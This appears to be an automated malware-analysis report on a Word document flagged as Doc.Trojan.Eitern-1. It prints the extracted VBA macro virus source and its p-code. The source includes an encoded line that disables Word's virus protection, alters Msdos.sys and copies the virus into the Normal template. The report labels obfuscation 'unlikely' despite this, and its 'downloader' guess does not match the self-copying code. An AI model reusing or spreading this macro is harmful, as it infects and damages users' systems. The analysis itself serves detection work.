Verdict: MALICIOUS (Risk Score: 180)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a strong indicator of malicious intent. The macro attempts to write its own code to 'C:\Eitern.inf' and then likely execute it. The ClamAV detection of 'Doc.Trojan.Eitern-1' further supports the malicious classification. The macro's obfuscation and self-modification suggest a downloader or dropper functionality.
Heuristics (3)
- ClamAV: Doc.Trojan.Eitern-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Eitern-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: fab1f3df9a7c28c3bebd24daebe550646d320459e8da9d26066fc65ddd28e54a) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4872 bytes |

Detection:
- ClamAV: Doc.Trojan.Eitern-1
- Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Open "C:\Eitern.inf" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
I = (MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(8, 1))
For X = 2 To Len(I): B$ = Asc(Mid(I, X, 1)) - 1: C$ = C$ & Chr(B$): Next X: A = C$
MacroContainer.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 1, "Private Sub Document_Close()"
MacroContainer.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 8, A
MacroContainer.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 2, 6
'Po!Fssps!Sftvnf!Ofyu;!Pqujpot/DpogjsnDpowfstjpot!>!)1!.!1*;!Pqujpot/TbwfOpsnbmQspnqu!>!)2!.!2*;!Pqujpot/WjsvtQspufdujpo!>!)3!.!3*;!DpnnboeCbst)#Uppmt#*/Dpouspmt)#Nbdsp#*/Efmfuf Jg!Ebz)2*!Uifo;!TfuBuus!#D;]Ntept/tzt#-!wcOpsnbm;!Tztufn/QsjwbufQspgjmfTusjoh)#D;]Ntept/tzt#-!#Pqujpot#-!#CppuHVJ#*!>!#1#;!TfuBuus!#D;]Ntept/tzt#-!wcTztufn!,!wcIjeefo!,!wcSfbePomz OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/EfmfufMjoft!2-!OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/DpvouPgMjoft;!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/EfmfufMjoft!2-!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/DpvouPgMjoft OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/BeeGspnGjmf!)#D;]Fjufso/jog#*;!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/BeeGspnGjmf!)#D;]Fjufso/jog#*;!BdujwfEpdvnfou/TbwfBt!GjmfObnf!>!BdujwfEpdvnfou/GvmmObnf
End Sub

' Processing file: /opt/analyzer/scan_staging/23d79a50e4854923aa7124ab16b8b830.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3205 bytes
' Line #0:
'     FuncDefn (Private Sub Document_Open())
' Line #1:
'     LitStr 0x000D "C:\Eitern.inf"
'     LitDI2 0x0001
'     Sharp
'     LitDefault
'     Open (For Output)
'     BoS 0x0000
'     LitDI2 0x0001
'     Sharp
'     PrintChan
'     LitDI2 0x0001
'     LitDI2 0x0001
'     Ld MacroContainer
'     MemLd VBProject
'     MemLd VBComponents
'     ArgsMemLd Item 0x0001
'     MemLd CodeModule
'     MemLd CountOfLines
'     LitDI2 0x0001
'     Ld MacroContainer
'     MemLd VBProject
'     MemLd VBComponents
'     ArgsMemLd Item 0x0001
'     MemLd CodeModule
'     ArgsMemLd Lines 0x0002
'     PrintItemNL
'     BoS 0x0000
'     LitDI2 0x0001
'     Sharp
'     Close 0x0001
' Line #2:
'     LitDI2 0x0008
'     LitDI2 0x0001
'     LitDI2 0x0001
'     Ld MacroContainer
'     MemLd VBProject
'     MemLd VBComponents
'     ArgsMemLd Item 0x0001
'     MemLd CodeModule
'     ArgsMemLd Lines 0x0002
'     Paren
'     St I
' Line #3:
'     StartForVariable
'     Ld X
'     EndForVariable
'     LitDI2 0x0002
'     Ld I
'     FnLen
'     For
'     BoS 0x0000
'     Ld I
'     Ld X
'     LitDI2 0x0001
'     ArgsLd Mid$ 0x0003
'     ArgsLd Asc 0x0001
'     LitDI2 0x0001
'     Sub
'     St B$
'     BoS 0x0000
'     Ld C$
'     Ld B$
'     ArgsLd Chr 0x0001
'     Concat
'     St C$
'     BoS 0x0000
'     StartForVariable
'     Ld X
'     EndForVariable
'     NextVar
'     BoS 0x0000
'     Ld C$
'     St A
' Line #4:
'     LitDI2 0x0001
'     LitStr 0x001C "Private Sub Document_Close()"
'     LitDI2 0x0001
'     Ld MacroContainer
'     MemLd VBProject
'     MemLd VBComponents
'     ArgsMemLd Item 0x0001
'     MemLd CodeModule
'     ArgsMemCall ReplaceLine 0x0002
' Line #5:
'     LitDI2 0x0008
'     Ld A
'     LitDI2 0x0001
'     Ld MacroContainer
'     MemLd VBProject
'     MemLd VBComponents
'     ArgsMemLd Item 0x0001
'     MemLd CodeModule
'     ArgsMemCall ReplaceLine 0x0002
' Line #6:
'     LitDI2 0x0002
'     LitDI2 0x0006
'     LitDI2 0x0001
'     Ld MacroContainer
'     MemLd VBProject
'     MemLd VBComponents
'     ArgsMemLd Item 0x0001
'     MemLd CodeModule
'     ArgsMemCall DeleteLines 0x0002
' Line #7:
'     QuoteRem 0x0000 0x036D "Po!Fssps!Sftvnf!Ofyu;!Pqujpot/DpogjsnDpowfstjpot!>!)1!.!1*;!Pqujpot/TbwfOpsnbmQspnqu!>!)2!.!2*;!Pqujpot/WjsvtQspufdujpo!>!)3!.!3*;!D ... (truncated)
```